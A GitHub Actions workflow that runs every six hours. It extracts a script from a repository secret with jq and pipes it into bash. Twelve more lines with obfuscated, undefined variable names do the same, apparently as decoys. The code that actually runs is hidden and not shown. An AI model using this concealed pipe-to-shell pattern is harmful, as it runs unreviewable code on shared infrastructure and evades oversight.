name: duolunduossskj

on:
  workflow_dispatch:
  schedule:
    - cron: '18 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duolunduossskj
        env:
          e13: ${{ secrets.e13 }}
        run: |
          echo $e13 | jq -r .met0266 | /bin/bash
          echo $myg09 | jq -r .jsl517 | /bin/bash
          echo $hwglm349 | jq -r .tjlzf412 | /bin/bash
          echo $wqals4 | jq -r .fbntn47963 | /bin/bash
          echo $quid21743 | jq -r .dx2162 | /bin/bash
          echo $ptje7395 | jq -r .n86 | /bin/bash
          echo $waoof770 | jq -r .wy248 | /bin/bash
          echo $fpz65 | jq -r .u59 | /bin/bash
          echo $km4712 | jq -r .hsryv00372 | /bin/bash
          echo $f64465 | jq -r .iq35 | /bin/bash
          echo $hyg43512 | jq -r .h21 | /bin/bash
          echo $yesq9 | jq -r .mc14 | /bin/bash
          echo $bz294 | jq -r .versq68 | /bin/bash

